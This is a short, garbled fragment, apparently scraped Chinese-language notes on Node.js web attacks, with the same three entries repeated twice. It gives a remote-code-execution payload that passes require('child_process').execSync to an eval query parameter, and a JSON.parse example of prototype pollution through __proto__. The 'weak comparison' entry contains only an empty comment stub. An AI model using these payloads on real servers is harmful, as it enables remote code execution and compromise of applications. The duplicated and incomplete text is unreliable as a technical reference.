RCE:
1 | ?eval=require("child_process").execSync('ls') |
弱比较:
1 | /* GET home page. */ |
原型链污染
1 | let o1 = {} let o2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}') |
RCE:
1 | ?eval=require("child_process").execSync('ls') |
弱比较:
1 | /* GET home page. */ |
原型链污染
1 | let o1 = {} let o2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}') |